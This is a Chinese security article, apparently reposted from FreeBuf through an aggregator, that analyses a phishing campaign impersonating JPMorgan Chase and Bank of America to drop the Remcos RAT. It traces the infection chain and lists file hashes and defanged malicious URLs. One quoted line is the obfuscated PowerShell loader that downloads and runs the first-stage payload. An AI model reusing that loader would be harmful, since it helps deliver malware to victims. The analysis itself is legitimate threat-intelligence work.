7

冒充银行钓鱼的Remcos RAT Dropper分析

 2 years ago
source link: https://www.freebuf.com/articles/network/321114.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

冒充银行钓鱼的Remcos RAT Dropper分析 限时体验

编组备份 4

网页灯泡

主站
漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全
头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
行业专区
政 府
CNCERT CNNVD
登录 注册
试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
冒充银行钓鱼的Remcos RAT Dropper分析
冒充银行钓鱼的Remcos RAT Dropper分析
Avenger 2022-01-28 15:43:42 35884 3

近日,研究人员发现大量假借摩根大通银行和美国银行名义散发的钓鱼邮件,附件中会包含银行的名称和徽标。

image.png-92kB摩根大通银行

image.png-214kB美国银行

该恶意 XLSX 文件(c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b915)会在启动时执行以下代码以加载第一阶段的 Payload。代码首先检查是否能够联网,接着下载并执行 Payload(3cc322e6044691b7b2ce8937d90dccf0cb6b6692cbee40742356777762c2cc71)。

ping google.com;b4df='olnwoD.)tnei' + 'lCb'; ,''gv6BNpMg30gwvPA=yekhtua&30212%3F148E16A9A6766D=diser&3F148E16A9A6766D=dic?daolnwod/moc.evil.evirdeno//:ptth''(eliFda';c3,we22 -Join '';IEX(([regex]::Matches(env:temp+ '\twt.vbs')

第一阶段的 Payload 会加载下一阶段的 Payload,脚本使用了较为简单的方法(字符转十六进制)来隐藏下一阶段的恶意 URL。

image.png-140.3kBtweet.vs

下载的 Payload 会被写入注册表并在系统重启时启动恶意软件。

image.png-147.3kBtvt.vbs

image.png-194.4kB第二阶段

第二阶段的 Payload 是 PowerShell 脚本:

image.png-86.8kBPowerShell 脚本

攻击链的最后是一个 .js 脚本( ef3e6b1fb39341321591d2df51a29ff0365d5e997bcb7a10f4f1fbcd1a8468dd),其中包含一个可执行库文件。下图可见,代码中增加了许多垃圾内容进行混淆,在运行时用零替换不必要的字符串再启动动态链接库。

image.png-387.2kB.JS 文件

提取数据后可以得到一个使用 C# 编写的可执行库文件,这就是最后投递的恶意样本( b7fd83f6d8bbd17d4aefa8f4e28d4503f1c4ab6ab70401b1a67e209da6197cde73ee036d191c9b2d717e94b2bae87622fce097a42d61594ee8cc1ab5b92749f1)。

该文件是 Remcos RAT 远控木马,攻击者可以通过该恶意软件获取未授权的远程访问能力。

c70048c0a6636b934623cebe544300c9a950c7bdd542ebe1b6dd06498ca1b915
87d78153d9d87c7e7e130feb052b1059837dcf6ebe0a128b75be75062ee11f9f
d874fc97e460e2c147782581d320f1673780ee99246286ce9d248c2a20a98773
7e97a402dfea6b367245ba7a7b7e9811a867e23d4a339f14f79a7420b5b6f5a6
b1df072eba923c472e461200b35823fde7f8e640bfb468ff5ac707369a2fa35e
e37875bf204cb272dc38240363cc1e75929104b61ca0143441062b461ea8ce1f
08a1259090d5bf015cfd80caa7ac3ff5060ad503825ea5a5f010cec03178c157
hxxp://104.223.119.167/calient.jpg
hxxp://104.223.119.167/han.jpg
hxxp://64.188.19.241/na.jpg
hxxp://64.188.19.241/atc.jpg
hxxp://64.188.19.241/rtc.jpg
hxxp://64.188.19.241/ghini.vbs

INQUEST

本文作者:Avenger, 转载请注明来自FreeBuf.COM

# javascript # powershell # 银行木马 # Remcos RAT

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK